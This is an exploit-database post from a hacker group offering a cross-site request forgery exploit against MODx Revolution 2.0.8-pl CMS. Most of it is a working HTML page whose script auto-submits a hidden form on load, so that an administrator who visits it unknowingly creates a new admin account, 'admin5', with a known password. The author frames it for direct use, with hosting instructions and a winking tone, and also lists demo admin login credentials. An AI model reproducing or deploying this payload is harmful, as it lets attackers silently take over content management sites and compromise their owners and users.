#(+) Exploit Title: MODx Revolution 2.0.8-pl CMS XSRF Vulnerability (Add new user) #(+) Author : ^Xecuti0n3r #(+) E-mail : xecuti0n3r()yahoo.com #(+) Category : Web Apps [XSRF] #(+) Demo Link : http://www.cmsagora.com/demo.php?id=50&type=2 #(+) Demo Login: Username: admin Password: demo123 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm ^Xecuti0n3r member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #All you have to do is save the below code as exploit.html #Then Host a website with the exploit.html file. A person with admin permissions if visits the site, # will automatically creat user admin5 with password "newpassword" without warning ;) ____________________________________________________________________ ____________________________________________________________________ Code: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>MODx Revolution 2.0.8-pl CMS XSRF Vulnerability</title> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 4; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <H2>MODx Revolution 2.0.8-pl CMS XSRF Vulnerability</H2> <form method="POST" name="form0" action="http://localhost/connectors/security/user.php"> <input type="hidden" name="action" value="create"/> <input type="hidden" name="modx-ab-stay" value=""/> <input type="hidden" name="groups" value="[]"/> <input type="hidden" name="extended" value="{}"/> <input type="hidden" name="HTTP_MODAUTH" value="modx4d6fcaf3f110b1.95465957"/> <input type="hidden" name="id" value="0"/> <input type="hidden" name="newpassword" value="false"/> <input type="hidden" name="modx-user-fs-newpassword-checkbox" value="on"/> <input type="hidden" name="passwordnotifymethod" value="s"/> <input type="hidden" name="passwordgenmethod" value="spec"/> <input type="hidden" name="specifiedpassword" value="newpassword"/> <input type="hidden" name="confirmpassword" value="newpassword"/> <input type="hidden" name="username" value="admin5"/> <input type="hidden" name="active" value="1"/> <input type="hidden" name="fullname" value=""/> <input type="hidden" name="email" value="admin@admin.com"/> <input type="hidden" name="phone" value=""/> <input type="hidden" name="mobilephone" value=""/> <input type="hidden" name="address" value=""/> <input type="hidden" name="city" value=""/> <input type="hidden" name="fax" value=""/> <input type="hidden" name="state" value=""/> <input type="hidden" name="zip" value=""/> <input type="hidden" name="country" value=""/> <input type="hidden" name="website" value=""/> <input type="hidden" name="dob" value=""/> <input type="hidden" name="gender" value=""/> <input type="hidden" name="comment" value=""/> <input type="hidden" name="failedlogincount" value=""/> <input type="hidden" name="blockeduntil" value=""/> <input type="hidden" name="blockedafter" value=""/> <input type="hidden" name="extended_name" value=""/> <input type="hidden" name="extended_value" value=""/> <input type="hidden" name="extended_id" value=""/> </form> </body> </html> ######################################################################## (+)Exploit Coded by: ^Xecuti0N3r (+)Special Thanks to: MaxCaps, d3M0l!tioN3r, aNnIh!LatioN3r (+)Gr33ts to : Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) + All the 31337 Members :) (+)<3 to :Indian Cyber Army & Indishell Crew (+)Gr33ts to : exploit-id.com , packetstormsecurity.org , securityreason.com ########################################################################